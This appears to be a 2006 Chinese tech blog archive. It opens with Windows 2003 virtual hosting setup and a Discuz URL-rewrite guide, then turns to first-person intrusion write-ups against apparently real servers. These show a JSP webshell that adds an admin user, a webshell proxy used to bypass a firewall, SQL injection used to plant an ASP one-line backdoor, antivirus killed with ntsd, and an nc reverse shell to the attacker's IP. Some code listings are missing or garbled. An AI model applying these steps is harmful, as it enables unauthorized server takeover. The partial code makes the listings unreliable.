随着Internet越来越普及,各种各样的虚拟主机也越来越多,由于虚拟主机需要同时向大量不同的用户提供安全的网络应用环境,因此搭建一个虚拟主机平台除了需要架设WEB和FTP服务器,还涉及到一些虚拟主机环境所特有的问题。以下就对这些特有的问题进行归纳和分析。我个人认为在建立虚拟主机时主要需要注意以下三个大方面:
1.用户与磁盘空间和域名的绑定;
2.用户使用磁盘空间的容量限制(磁盘配额);
3.IIS和用户环境的安全问题(我使用的是Windows Server系统);
下面我就以这三个方面在Windows 2003 Enterprise Server具体如何实现做一个详细的介绍。
一、用户与磁盘空间和域名的绑定
先打开计算机管理(要是服务器已经升成为AD模式,就打开Active Directory用户与计算机),点击展开本地用户和组,右键单击用户模块分别创建两个用户帐号。我这里建立的用户帐号依次为test1、test2。注意,为了安全考虑,请在组的模块中新建一个组。把用于虚拟主机的用户归纳到里面,并把用户原来隶属于的User组删除。(作为一个称职的管理员,需要注意的小细节是很多的,不然一个错误的细节就会引起灾难)如图1:
建立好帐号后,就在FTP空间目录下先建立一个LocalUser文件夹。然后对应所使用的帐号建立子文件夹。如:要是FTP空间指定的是D:\ WEB_Space文件夹,那就在这个文件夹下创建一个LocalUser文件夹。接着建立两个子文件夹:test1、test2.如图2:
由于刚才我们建立用户帐号时,把它们单独的归纳到一个组中,这时就需要在FTP空间根目录属性的安全选项卡中把这个组添加进去,用户将无法通过FTP访问。如图3:
接着我们需要建立FTP 用户隔离站点。这个功能是以前版本的IIS中FTP站点所没有的,FTP 用户隔离为 Internet 服务提供商 (ISP) 和应用服务提供商提供了解决方案,使他们可以为客户提供上载文件和 Web 内容的个人 FTP 目录。FTP 用户隔离通过将用户限制在自己的目录中,来防止用户查看或覆盖其他用户的 Web 内容。
因为顶层目录就是 FTP 服务的根目录,用户无法浏览目录树的上一层。在特定的站点内,用户能创建、修改或删除文件和文件夹。FTP 用户隔离是站点属性,而不是服务器属性。无法为每个 FTP 站点启动或关闭该属性。所以在建立FTP站点的时候就应该选择好,不然站点建立以后,将无法修改。
FTP 用户隔离共有三种模式:
不隔离用户:该模式不启用 FTP 用户隔离。该模式的工作方式与以前版本的 IIS 类似。由于在登录到 FTP 站点的不同用户间的隔离尚未实施,该模式最适合于只提供共享内容下载功能的站点或不需要在用户间进行数据访问保护的站点。
隔离用户:该模式在用户访问与其用户名匹配的主目录前,根据本机或域帐户验证用户。所有用户的主目录都在单一 FTP 主目录下,每个用户均被安放和限制在自己的主目录中。不允许用户浏览自己主目录外的内容。如果用户需要访问特定的共享文件夹,您可以再建立一个虚拟根目录。该模式不使用 Active Directory 目录服务进行验证。 注意 当使用该模式创建了上百个主目录时,服务器性能会下降。
用 Active Directory 隔离用户:该模式根据相应的 Active Directory 容器验证用户凭据,而不是搜索整个 Active Directory,那样做需要大量的处理时间。将为每个客户指定特定的 FTP 服务器实例,以确保数据完整性及隔离性。当用户对象在 Active Directory 容器内时,可以将 FTPRoot 和 FTPDir 属性提取出来,为用户主目录提供完整路径。
如果FTP 服务能成功地访问该路径,则用户被放在代表 FTP 根位置的该主目录中。用户只能看见自己的 FTP 根位置,因此受限制而无法向上浏览目录树。如果 FTPRoot 或 FTPDir 属性不存在,或它们无法共同构成有效、可访问的路径,用户将无法访问。
打开Internet信息服务(IIS)管理器,点击展开服务器,右键单击FTP站点,新建一个FTP站点,在建立向导中,因为我的服务器不是Active Directory模式,所以我们选择隔离用户这个选项。如图4:
完成建立向导后,开打新建立的FTP站点属性,点击属性中的安全用户选项卡,把允许匿名连接关闭。确定后退出。
最后是域名的绑定,域名绑定有两种定义,第一种是直接使用完整域名绑定WEB服务,如在服务器上提供www.test1.com和www.test2.com空间服务,第二种是开设子域名服务,如提供test1.yesky.com和test2.yesky.com空间服务。这两种在工作原理上是一样的,但第二种在操作上有一些不同。需要自己服务器的DSN支持。
首先我们让我们来了解一下关于域名(DNS)的基本知识,在我们要了解DNS,首先要了解几个名词:域名空间;根域;顶级域;二级域;主机名;区域。
域名空间:是DNS名的结构统称,他的结构主要是由根域,顶级域,二级域和主机名组成。
根域:是处在整个结构的顶级,是用点(.)表示的。由国外的几个公司管理的。55555没有我们的份~郁闷!!)
顶级域:是由2-3个英文字母组成,并且有着一定的意义,一般采用相对意义的英文单词缩写或相对代码。如:COM是指商业机构,GOV是指政府机构,CN是指中国……
二级域:是由一些域名提供商出租给个人或企业、机构的服务。如www.yesky.com这个域名中yesky就属于二级域。
主机名:是用来表示Internet或内部网的计算机名称,但大家注意一点,在Internet上,有的时候主机名指代表一台服务器的IP地址,而不是服务器的名称,这一点是和内部网有区别的!
区域:是域名空间中的一个离散部分。区域主要是用来把一个域名变成可管理的几个部分,如:www.yesky.com这个域名我们可以把他划分成www和yesky,com这两个部分。这样,我们就可以利用yesky.com这部分生成不同的主机名。如mail.yesky.com;bbs.yesky.com等等。这一点比较重要。
DSN服务工作的流程我们可以把它称作名字解析过程,它共分为两种:正向搜索和反向搜索。正向搜索是把一个域名解析成一个IP,我们这里就用Internet上的www.yesky.com域名做一个案例。
我们先在IE浏览器中输入www.yesky.com这个域名,然后计算机将自动把这个域名传递给本地DNS服务器(也就是指在本机网卡属性中TCP/IP协议的DSN服务器输入框里输入的IP地址所对应的服务器),DNS服务器收到信息后,将在自己的区域表中搜索有没有该域名所对应的IP!有则返回,若没有,它则会把搜索的信息传递给国外的几个根域DSN服务器之一,请求解析该域名。
根域DSN服务器则返回一条对COM域DNS服务器的IP地址给本地DNS服务器引用(由于yesky.com的顶级域是COM所以返回COM域DNS服务器的IP地址),本地DNS服务器在根据IP地址给COM域DNS服务器发送一条www.yesky.com域名解析请
求的信息,COM域DNS服务器返回一条对yeskyDSN服务器的IP地址指引,然后本地DNS服务器再根据收到的IP地址给yeskyDSN服务器,发送一条www.yesky.com域名解析请求的信息,yeskyDSN服务器根据请求反馈给www的IP地址,本地服务器再把这个IP反馈给我们。这时解析完成,我们也就打开了www.yesky.com的网页。
反向搜索正好相反,它是把一个IP地址解析成一个域名,常看见的诸如Windows 2003下的Nslookup命令工具。由于DNS服务是按域名而不是按IP地址索引的,反向搜索一搜索就会搜索所有的信息,很消耗资源。为了避免这种情况,DNS服务创建了一个叫in-addr.arpa的特殊二级域,它使用的是与其他域名空间结构相同的方法,但它不采用域名,而是采用IP地址。
注意,要想做Internet上第二种虚拟主机,最好向域名提供商申请DNS转移权,要求提供商把DNS解析权指定到你的DNS服务器上,这样你就能自己利用Windwos Server的DSN服务随意开设子域名了,不然你每次要用一个新的子域名都要向域名提供商申请,那是很麻烦的,而且DSN在自己的服务器上还有很多好处,如开设MAIL服务等等。
先来打开DNS管理器,点击展开服务器,在正向查找区域新建一个区域。选择创建主要区域,输入你申请的域名,注意,只要输入我上面所说的区域就可以了,如yesky.com、sina.com.cn。完成。如图5:
创建好区域后,就在你创建的区域里创建主机。最好创建的主机名与你的用户名相同,这样方便管理。当然,如果你的系统已经升级到AD模式,那这步可以跳过,因为在AD模式下,你每创建一个帐户,就会自动的生成对应的主机名称。如图6:
所有的主机都创建好了后,就打开Internet信息服务(IIS)管理器,在WEB站点下创建新的WEB站点。在站点创建向导的IP地址和端口设置对话框中输入需要绑定的完整域名,如www.test.com、test1.test.com、test12.test.com,创建完成后,域名就和空间绑定了。如图7:
在DNS中有多少个主机,就可以建立多少个子域名WEB站点。也可以用域名提供商提供的直接指定IP的域名。但这里需要注意的是,一旦服务器中Internet信息服务(IIS)管理器里出现了带主机头的站点后,有时将会导致没有主机头的站点出错,这个问题很奇怪,可是能DNS映射引起的。
二、用户使用磁盘空间的容量限制(磁盘配额)
在配置之前,让我们先了解一下磁盘配额管理的一些基础知识,以便我们更容易理解它的工作方法。Windows 2003磁盘配额会跟踪每个用户在每个盘符中的使用情况。并根据用户的磁盘配额进行控制。因为配额是以每个用户做为单位进行跟踪的,所以不管用户在这个盘符下的任何地方储存文件都会被记录。磁盘配额共有二个比较显著的特点:
1.根据每个用户所拥有的文件和文件夹来计算使用磁盘的空间量。当一个新建、复制、保存文件到开启了磁盘配额的盘符上,或获得盘符上某文件所有权时,系统就自动从磁盘配额管理所限定的空间中扣减该用户的空间容量。
2.系统在计算用户使用磁盘空间时是忽略压缩的,它按照未压缩的字节计算用户使用的硬盘空间,而不管用户实际使用了多少磁盘空间。这样做是因为现在很多不同的文件类型在压缩的时候所压缩的比例不同。会造成文件长度的很大差异,给磁盘管理带来很大的工作负担。
注意,磁盘配额必须建立在NTFS格式的盘符上。不然无法使用。
选择你FTP空间所在的盘符,打开盘符的属性对话框,单击配额选项卡,选择启用配额管理复选框,开启磁盘配额管理。这是原本一些灰色不能使用的属性开始能使用了。请根据情况修改它们:如图8:
拒绝将磁盘空间给超过配额限制的用户:选择这个复选框,当用户超过了分配的磁盘空间时,他们就会收到一个空间已用完的消息,而且不能在往空间里面写任何东西
不限制磁盘使用:当你不打算限制用户磁盘空间时,单击这个选项。
将磁盘空间限制为:配置用户可以使用的磁盘空间容量
将警告等级设置为:配置在用户登陆空间时,如果空间使用已经达到警告空间等级,将会发送一个信息给该用户,提醒用户空间快使用完了
配额项:单击这个按钮可以打开配额项对话框,在这个对话框中,可以通过配置菜单分别定制每个用户磁盘空间。也可以删除老用户空间配额限制。另外它的主界面就是一个用户配额监控器。如图9:
设置好后确定-关闭属性窗口,这时用户的磁盘配额就已经设置好了。还是比较简单的。
三、IIS和用户环境的安全问题
记得一位资深的安全人士曾经说过,从Windows 2000 Server开始,本身的系统漏洞和网络漏洞已经不是那么多了,甚至可以说Windows本身安全系数已经超越了LINUX系统本身,(这里我只是引用语句,希望不会引发Windows和LINUX向来的争论)但由于Windows周边产品漏洞和不安全因数太多,尤其是IIS服务。才导致人人说它不安全。
由于系统的安全问题实在是太过于庞大,所分的体系也非常多,不可能面面具到,所以我根据个人经验说几个和虚拟主机密切相关的安全问题,但由于这些问题要想得到彻底的解决说明的话,那需要太多的篇幅,这里我也只能指出这些问题,和解决这些问题的思路。
支持ASP系统的IIS安全问题:
在支持ASP的IIS系统中,主要问题有两个,一个是由于ASP页面的输入框引起的安全攻击。在ASP页面中,我们经常可以看见输入框,如登录帐号、密码、查询、手机等等..这些控件其实是很危险的,因为这些控件的后台往往是连接着数据库,(SQL、Oracle等)有经验的程序员可以通过这些输入框输入数据库命令,在通过系统本身的数据库执行后,得到数据库帐号和密码。那也意味着离得到SYSTEM或Administrator帐号不远了。
所以,一般在做ASP页面时,我们在有这些输入框的窗口上都做一些限制,如最多只能输入多少个字符、哪些特殊字符不允许输入等等。但现在很少有网站能做到滴水不漏的,可能也是因为工作量太大的缘故吧:( 第二个问题是FileSystemObject这个组件为 ASP 提供了对默认的Windows Server服务器硬盘上的任何文件进行读、写、复制、删除、改名等操作。权限实在是太大。也导致一些恶意虚拟主机租借用户利用这个ASP组件来攻击和控制系统。所以在不是必要的情况下,请不要启用它。太危险了。
基本系统设置安全问题:
一、端口设置。端口是计算机和外部网络相连的逻辑接口,也是计算机的第一道屏障,由于做虚拟主机的系统一般不需要开太多的端口,所以可以在网卡属性、Internet协议(TCP/IP)属性、高级、选
分类 : 技术文摘 | 发表时间 30-04-2006
分类 : 技术文摘 | 发表时间 25-04-2006
这两天研究Discuz 4.1,并成功地将原来一个Discuz 2.5的论坛升级到了最新版本,个人感觉这个论坛实在不错。
我的Discuz 4.1是在Apache+Php+Mysql下运行的,并开启了Url Rewrite,之后我发现整个论坛的大部分页面都可以使用html的静态地址方式来访问,感觉真不错,Apache实在太强大了,难怪现在用Apache的站点那么多。
IIS下能否也实现这种静态化功能呢,我知道Helicon开发了一个叫ISAPI_Rewrite的ISAPI程序,可以在IIS下实现Url Rewrite功能,不过我自己还没有尝试过,过两天按照下面的操作测试一下看看效果如何。另外,下文Discuz提供的ZIP文件里的Rewrite.dll实际上就是Helicon的ISAPI_Rewrite程序,我对Discuz做为软件开发商居然也盗版同行的软件感到遗憾。
参考文章:Discuz!4.1.0 IIS Rewrite配置方法(转自DISCUZ会员区)
Discuz! URL静态化功能受到论坛所在服务器环境的制约,在开启此功能之前,请根据你的Web服务器环境,选择相应的环境配置方法,以下提供的iis6下的服务器配置..其它服务器(如apache,zeus)你可以根据原理自行配置。
1、下载IIS Rewrite模块:http://download.discuz.net/4.1.0/discuz_iis_rewrite.zip;
2、将压缩包解压到任意目录,(如:C:\Rewrite)。然后打开“控制面板”-“管理工具”-“IIS信息服务管理器”-“网站”-“您的站点”-“属性”。在“ISAPI筛选器”项点击“添加”,筛选器名称填入Rewrite,可执行文件为C:\Rewrite\Rewrite.dll;
3、重新启动IIS就可以生效了。
通过上述配置后,您就可以在Discuz!4.1.0后台中根据需要开启影响的静态功能了。
无:不启用URL静态化功能。
Discuz!Archiver静态化:当论坛启用Archiver功能时,Archiver内的所有链接均采用*.html形式。
普通页面静态化:对论坛常用页面(如forumdisplay.php、viewthread.php、viewpro.php等)进行URL静态化转换。
Archiver和普通页面均静态化:对Archiver以及论坛常用页面(如forumdisplay.php、viewthread.php、viewpro.php等)进行URL静态化转换。
使用注意事项:
您可以通过系统设置中Discuz!选项来控制URL静态化的打开或关闭及其工作状态,本功能对服务器环境有特殊要求,独立主机用户需要对Web服务器增加相应的Rewrite规则,因此需要服务器权限才可使用;对于虚拟主机用户,您需要向您的空间服务商进行咨询:空间是否支持Rewrite以及是否支持对站点目录中.htaccess的文件解析,只有满足这两条件,URL静态化功能才会生效。打开URL静态化后,论坛一些常用链接会变成类似discuz/forum-1-1.html形式,如果您的服务器环境不支持或者尚未配置好,访问这些链接会出现“网页无法显示”的错误信息,论坛将无法正常访问。发生无法访问的现象时,请您进入管理后台,关闭URL静态化功能,论坛即可恢复正常状态。
本文提供的压缩包中还有一个httpd.ini文件,该文件是rewrite规则的配置文件。内容如下(无需修改):
[ISAPI_Rewrite]
# 3600 = 1 hour
CacheClockRate 3600
RepeatLimit 32
# Protect httpd.ini and httpd.parse.errors files
# from accessing through HTTP
RewriteRule ^(.*)/archiver/([a-z0-9\-]+\.html)$ $1/archiver/index\.php\?$2
RewriteRule ^(.*)/forum-([0-9]+)-([0-9]+)\.html$ $1/forumdisplay\.php\?fid=$2&page=$3
RewriteRule ^(.*)/thread-([0-9]+)-([0-9]+)-([0-9]+)\.html$$1/viewthread\.php\?tid=$2&extra=page\%3D$4&page=$3
RewriteRule ^(.*)/profile-(username|uid)-(.+)\.html$ $1/viewpro\.php\?$2=$3
网站盈利很难吗?非也。
我自己做过好几个盈利的网站了。
网站盈利有一个突出的优势,即成本非常低。这最符合经商的一条黄金定律,即“低价买进,高价卖出”。我身边也有一些朋友没有网站同样在网上赚到了白花花的银子。
所以控制一个网站的成本是非常重要的。
下面请看我做一个网站的投入:
国际域名一个 每年58元。
7*24小时稳定动态虚拟主机空间一个,支持数据库
每年200元
平时用的电脑就不算了吧
480元钱包14个月的上网费也不算了,哦,还有电费,因为即使不做网站也要上网的。
工费,不算了,业余爱好,只占用业余时间(^-^也没少占用上班时间,谁叫我们工资低还经常拖欠呢)
技术?呵,网站是不是挣钱和技术关系不大。
推广?呵,网站盈利和不正确的推广方法成反比,所谓不正确的推广方法是指那些花钱象花公款,烧钱都不心疼的***。再说了我们这样的穷人借遍七大姑八大姨也就凑个十万二十万,还不够在网上打水漂的,不小心,走到大街上被人指脊梁骨,骂做败家子。
所以,穷人自有穷办法,我们这样的站长都有一些传男不传女的,打死都不说的推广绝活。无奈。所谓“穷生奸计、富长良心”可能就这个意思吧。一些个人站长随便使出个“奇技淫巧”就抵得上几万快钱的广告费。
像上面说的投入,每天几千的访问量没感觉有何迟钝,如果做纯静态的页面投入就更低了。一个每天有几千人来访的商店如果不赢利是如何也说不过去的。你总不能说网民都穷的掉渣吧。
我的经验,每天1000ip,没任何赢利模式的网站仅凭广告费能赚到100元左右,(当然每个网站的情况,每个广告的情况都不一样,需要认真用心研究)。那么一个一万ip的网站月入千元应该是常有的事。我们这样的凭着爱好做站的站长其实还有更大的收获,比如生活过的更充实、更快乐。呵呵,还有更重要的是,把做网站当作学习,比如我在和女朋友(我现在的老婆)谈恋爱时就做了一个恋爱兵法方面的网站~-~,我想创业当老板就做了个创业方面的网站,也小赚了点。现在我已经看准了互联网将是今后一个非常大的发展趋势,打算在网上起点风云,所以本着学习的目的搞了一个专门研究、交流网站发展的论坛,自己在网站建设、维护的过程中给一些站长朋友帮了些忙,自己也增加了不少见识。其实网站赢利不赢利不是最重要的,关键是你在建站的过程中有没有收获。做网站把身体搞垮了或者想钱想疯了其实是很可悲的一件事。
还有几句话想说:
1 互联网的本质是共享,主流是免费,主体是菜鸟。
2
前几天童心大发,在街上玩了回套圈游戏,就是花上一块钱,套上什么要什么那种,有一点感悟:那些贵重的、诱人的远景有可能就是陷阱,只有离你最近的才可能成为你真实的收获。所有的思想和行动只有和实际紧密结合时,才可能是成功的开始,当然也只是可能而已。
3
写到最后忽然灵光一现,是一句非常重要的、自我感觉非常精彩的一句话,稍一走神忽然就忘了,怎么也想不起来,看起来电脑有些地方比人脑要好,能随时保存,人的思维如果能保存,那么人就真的长生了。
4 如果觉的本文有些调侃而您感觉没有任何收获,那可能就是您至今没有收获的原因,也可能是您看完本文没有收获的原因。:-?
5 说的不对,请大家批评指正,但请不要骂人,更不能蒙面骂人,蒙面骂人者可耻。请参考〈致论坛骂人者〉
好了,就写到这里,我去想想我刚才想说什么来着,想不起来就太遗憾了!
分类 : 技术文摘 | 发表时间 15-03-2006
By:Lcx
可能很多人还不是很了解我所说的web脚本代理是个什么概念。WEB脚本代理就是在服务器上放一个asp或php等的动态的脚本,然后调用这个脚本去访问别的网站,那么被访问网站的显示你来访的IP就是服务器的IP。4ngel的PhpSpy后门和Marcos的aspadmin站长助手这两个webshell都集成了这个功能。无论是php或是asp的脚本代理其实都是调用了xmlhttp这一组件,将远程网站的数据用你所放webshell的服务器上来进行一次中转然后再将内容呈现给你而已。很多程序员都用这个原理来写一些小偷程序,像在网站上只放几个脚本文件就可以调用别的网站数据。如果我们把它用在了黑客攻击上,那能用它来做什么呢?我恰好用它来做了一点事,就是提升权限和内网入侵。
一、提升权限
这应当是一个特例,不过确确实实被我碰到了。我在一个被入侵的网站上放了一个海阳顶端网asp木马。这个网站是一个公司的独立服务器,所以目录权限并没有像虚拟主机设置的那样变态,几乎所有目录都有可写权限,wscript.shell等命令也能运行。不过也正是因为是公司的独立服务器,所以也没有装serv-u这样容易的提权软件,也没有额外的第三方服务软件,系统补丁打得也很快,提权还是比较困难。替换服务是一个可行的办法,不过需要时间等待。经过仔细查看,得到了一些有用信息。该服务器是IIS+ASP+ACCESS搭配的web服务器,装有防火墙,对外只开放了80端口。另外,还装有了一个apache+tomcat+jsp的内部web系统,开放的是8080端口,内部web系统的物理目录也查明是C:\ApacheGroup\Tomcat 5.0\server\webapps。这也是我以前装过apache+tomcat+jsp,凭经验判断出来的。通过在海阳顶端里运行netstat -an和用海阳顶端asp木马的查看服务选项及目录信息能够了解到这3点的,如图1、图2、图3所示。另外用ipconfig/all这个命令可以明确知道图1中显示的10.0.16.16这一内网ip的确就是该服务器的内网ip。
信息有了,提权思路也就来了。如果我能绕过防火墙,直接访问它内网的web系统http://10.0.16.16:8080,那么我就可以先用海阳顶端asp木马传一个jsp的webshell到它的物理目录C:\ApacheGroup\Tomcat 5.0\server\webapps,然后再来调用这个jsp的webshell了。它的tomcat是以服务的形式安装的,jsp一般是继承了其系统权限。开始我以为好办,直接用htran.exe这个工具将其8080端口转到外网,我不就可以成功了吗?结果令我很失望,端口是转出来了,不过还是访问不了它的jsp系统,不知是什么原因。冥思苦想中,突然想到了我传一个asp脚本代理到它的网站,再调用这个脚本代理去访问它的内网的jsp web系统不就可以了吗?它的内网web和外网web都在同一服务器上,用脚本代理去访问绕过防火墙是根本不成问题的,因为这个脚本代理会让内网web系统误认为是同一台机器在访问它。我手头上有一个Marcos写的WebProxy.asp脚本,就是起代理作用的。于是我改名为imgae.asp传到了外网asp系统的某个目录,先来看看它的效果:提交http://www.g****.com/uploadimages/image.asp?url=http://www.haiyang.net/safety/ip.asp,效果如图4所示。可以看到我的访问ip的确变成了www.g****.com该服务器的ip了。
www.haiyang.net/safety/ip.asp是我写的一个验证来访者ip、端口的小程序,代码很简单,如下:
★
ip->->port
->actfor->
★
好,脚本代理没有bug,那么再写一个jsp的webshell传到内网jsp web系统的物理目录下吧。jsp的webshell我写得很简单,就是一个直接运行命令加用户的的小脚本tlist.jsp,代码如下:
★
<%@page import="java.io.*,java.util.*,java.net.*" %>
★
也许会有人问,那为什么不采用现成一些jsp木马呢。开始我还真试过了,因为我用的这个WebProxy.asp后边只能直接跟一个url文件,url文件里的某些post参数并不起作用,现成的jsp的木马写得都有点复杂,功能也多,因此一些命令不可避免地要运用到一些参数。我把这个tlist.jsp传到了内网web的物理目录下,然后直接运行http://www.generalichina.com/uploadimages/image.asp?url=http://10.0.16.16:8080/manager/tlist.jsp就在服务器上成功加了一个id为lcx的用户!如果要运行木马的话,你只要把tlist.jsp里的“●String cmd =”cmd.exe /c net user lcx lcx /add”;●”这句改动一下就可以了。像我传了一个tlist.exe到服务器的系统目录底下,然后改为“●String cmd =”tlist.exe”;●”,运行http://www.generalichina.com/uploadimages/image.asp?url=http://10.0.16.16:8080/manager/tlist.jsp运行效果如图5所示。
在实际操作过程中要注意一点,如果你用tlist.asp运行了一次命令的话,想改下代码运行其它的程序就要把tlist.asp改一次名,要不然还是回显上一次执行的结果。另外,不知是此台服务器特殊还是其它的原因,我把木马放在非系统目录,像c:\muma.exe,然后修改●String cmd =”cmd.exe /c net user lcx lcx /add”;●为●String cmd =”c:\muma.exe”;●木马并没有运行,只有放到系统目录system32底下才成功运行了,这个原因我现在也不是很明确。
二、入侵内网及其它妙用
入侵内网,在提升权限的第一个例子里其实已经很明确了,如果那台机器的内网web放在别的机器上,做法与提升权限的方法都是一样的,不过没有内外网在同一台机器上方便而已,这也算是脚本入侵内网的一个思路吧,实际意义不是很大,聊胜于无。其它妙用是什么呢?如果你在学校内网里,只能上内网和访问学校的web服务器,学校的web服务器与外网又是相同的,那你在web服务器放一个WebProxy.asp或其它的脚本代理,是不是你在内网访问http://学校的web服务器/WebProxy.asp?url=http://www.163.net/index.html就可以上外网了呢?一个asp脚本我估计就会解决以前很多学生的烦恼了吧?
http://lvhuana.bokee.com/inc/WebProxy.asp.rar
[最后修改由 neeao, 于 2006-03-14 17:13:51]
分类 : 技术文摘 | 发表时间 08-01-2006
来这个城市快两年了,无用过时的垃圾课程,名目繁多的考试。让人感觉到大学生活的两个字“不爽”。只有一个音乐电台陪我度过了两年无聊的大学生活。
近日,去它的网站逛了逛,大脑一发热,决定给她做个安全测试。网页是htm形式的,在上面乱点了一阵。没有发现使用动态页面的地方。用SUPERSCAN扫了一下,发现机子开了80和8080端口(安全意识还不错)系统方面应该没有什么问题(最起码在我看来)。
记得以前看过一个动画,讲的是如何注入htm形式的网站。其实,说白了也就是在htm里找带有asp之类的地方,不知道它是不是存在这个问题。半天工夫之后,还真让我给找到了一个使用asp的地方,随手加了一个单引号,返回错误。
依据返回的信息说明是SQL Server,看来不妙!网站使用的是独立服务器,因为用ip可以直接访问网站。用NBSI检测了一下这个连接,我靠!竟然是SA权限。
当时开始的时候,我是想先下载一个NC在NBSI里执行命令,然后再反向连接过来,这样就可以得到系统权限了。具体操作是用ECHO命令写一个ftp.txt。但是,我在输入命令之后发现结果并不像我想的那样顺利。当我输入一条echo命令发现竟然执行了7次。我的命令是echo open ftp.horizon.com>>F:\web\wsad\horizon.txt(F:\web为网站的根目录)。但是,结果却是写了7次,如果这样下载文件肯定不会成功。
不知大家注意过没有?在用NBSI执行命令的时候如果勾选了尝试返回结果,执行命令就会很慢。所以,这里为了提高执行命令的速度,就不要勾选尝试返回结果。这里由于不能把open ftp.horizon.com成功写入horizon.txt。所以,得另辟它路。
前面没成功,接着我想到了<%execute request(“1”)%>这个经典中的经典。如果能把它写入web目录就好办多了。现在<%execute request(“1”)%>就像是过街老鼠人人喊打,处境悲惨。即使有被打的危险,也还是要过街。但是,这里却有一个问题就是在NBSI里执行时,文件中的%被过滤了,少了%,废物一个。
当时我想了一个办法,既然它过滤了%,那么我就找它没有过滤掉的字符。例如“*”,这样我就可以先把<*execute request(“1”)*>写入文件,然后再把文件中的*换成%不就可以了。年轻人嘛,说干就干。不过这里要用到几个脚本。写文件的脚本horzion.vbs,命令格式为cscript horizon.vbs“要写的东西“objectfile”,内容为。
上面文件需要用echo命令把它写到服务器上***.vbe或***.vbs,然后再用这个vbs写我们要的文件,上面文件中类似于:“,%,&:和回车符是不能直接作为参数传递给脚本文件的。所以,我们这里还需要一个替换文件horizon1.vbs,作用就是替换特定字符串了。
这里简单解释一下:on error resume next是一个容错语句,至关重要,不管后面的程序发生什么意外,整个程序都将继续执行下去,直至结束。其次是IF语句,为了防止多条语句重复向文件写入相同的内容,这里加了一个标志若x=1才执行写文件,写完马上把x赋值2。这里可能有人会问为什么在每条语句后都加个“:”,其实,这是为了防止同一行有多条相同语句的情况,保证程序的顺利执行。
这样程序就不能正常执行了。如果想把:“,%,&,回车符直接作为参数传递给脚本文件,这里可以看出回车被“==”所替换,双引号被**替换,&被—替换,%被@@替换,在程序开始之前,我们先把文件open.ftp.horizon.com转换成可以被horizon.vbs接受的格式。用脚本转换horizon.vbs。命令格式为:
cscript horizon1.vbs 源文件 目标文件。
在本机执行cscript horizon1.vbs horizon.txt horiozn1.txt。其中horizon.txt文件中的内容为一句话后门<%execute request(“1”)%>。horizon1.txt文件中的内容为转换之后的horizon.vbs的ECHO代码。
我们在NBSI的那边NB Commander中一句一句执行上面的命令,等执行完之后,就会在对方的系统目录下生成一个文件horizon.vbe接着执行命令:
cscript writefile.vbe “<@@execute request(**1**)@@.>”F:\web\wsad\horizon.asp
这样一来我们就把一句话后门成功地写进了对方WEB目录了,相应的地址就是:http://www.***.com/wsad/horizon.asp。然后在把post.htm的form action指向该地址就OK了。
小提示:当我们在给脚本文件传递参数的时候,如果参数中带有空格的时候,就得用两个双引号将其括起来。
这样一来一个WebShell就到手了,这里为了防止其他意外情况,我在 horizon.asp文件中加了一句验证if request(“id”)=“horizon” then。如果在没有加参数id=horizon的情况下访问该页面的时候,只会显示一个空页面。在一定程度上可以保护我的战果哦!
不过现在看来拿下这个WebShell还真是费了一翻周折,不过最终还是搞到手了。继而想借此WebShell做点文章,但是不料发现这台机子设置的还是蛮BT的。晕,我狂晕,晕过之后再醒过来。
接着net user命令成功完成。再来个net start,发现有Serv-u,好东西!接下来一口气输入了n个命令,此时情报已经收集的差不多了。情报到手,准备开战,此战中立功最大的莫过于cacls了。其实这个命令对于高手们来说早都用滥了。不过为了照顾像我一样的菜菜们,这里稍作解释。cacls这个命令可以解除系统对目录的浏览限制。至于其具体用法,大家可以字cmd下输入cacls /?了解。
本来认为有了Serv-u之后,提权就不会有多难了。但是,事实证明我错了。这个Serv-u对于各种攻势都不感冒,我最终是无功而返,看来管理员还是蛮勤快的,将补丁都打上了。
东方不亮,西方亮。此路不通,另觅它路,难不成要吊死在一棵树上。开始的时候就想下个nc.exe进去。但未成功,片刻的休息之后,我停止的引擎又再次飞快的转动起来。
WebShell上传nc.exe还算顺利,因为机子上的瑞星早被我用ntsd –c -q -p PID给干掉了。先在本地nc -vv -l -p 80监听,然后再用nc.exe反向连接过来就OK。不过开始的时候,我还是犯了一个常识性错误,当时我没有多想就用WebShell反向连接过来的。因为WebShell本身只有iusr权限,所以我们反向连接过来的也只有iusr权限喽!因为这个,我当时被搞了一头雾水,开始怎么也想不明白?后来才恍然大悟过来啊!不过,幸好我“反应”算迅速,没有再按照原来的思路走下去。上面我都已经说了,这里不能用WebShell,要用NBSI,因为NBSI里反向过来的是administrator权限。呵呵!(注意哦)
nc 222.90.***.244 -r 80 -e cmd .exe
这里 222.90.***.244是我的ip。顺利得到了对方的一个Shell(这个Shell可是administrator权限)。^O^
之后我还试着尝试了另外几个端口,结果是都可以正常的反向连接过来,至此我并没有再继续下去。至于刚开始时的失败,我后来才发现原因是因为用horizon.vbe写的那个下载文件失败了。下载的文件为0字节。开始并没有注意到这点,后来才发现,很郁闷!看来做事千万马虎不得。
最后总结这次入侵的经历,其实最终能成功也是有一些偶然,假设这台服务器如果是台虚拟主机而不是台独立的服务器,那么SQL就不可能是SA权限。继而后面的许多工作就不会顺利下去。其次,成功的另外一个因素就是灵活的脚本应用,不然一句话后门就写不进去,接着后面的工作就都是白搭,不过庆幸的是最后还是搞下了。
作者: Horizon
来 源: 《黑客
防线》
资料来源:网络收集 原始作者:剑心 x-safe
以前的黑x中有对Php的注射的很多介绍,我等菜鸟也很是心痒,于是趁着有点时间就想练习练习在黑x里学的一些东西。
目标当时是选很经典的Php下载系统夜猫了,因为我没有Php和Mysql的测试环境,只有选这个结构比较熟悉的系统了,呵呵^_^。在google里搜索/down/show.php?id=,有几个这样的系统,可是测试了很多,却少有可以union出预期的结果的,都是union到50多个字段都不出结果,应该是Mysql不支持union查询的结果。又不愿意去像access一样猜测管理员密码,理由很简单,有了强大的load_file函数为什么还有做这些无聊的事情呢?有了密码不一定知道后台,有了后台不一定有上传,有……郁闷,总之就是想找到一个支持union和load_file的系统好好看看,一睹传说中的php注入直接得到系统权限的强大威力。
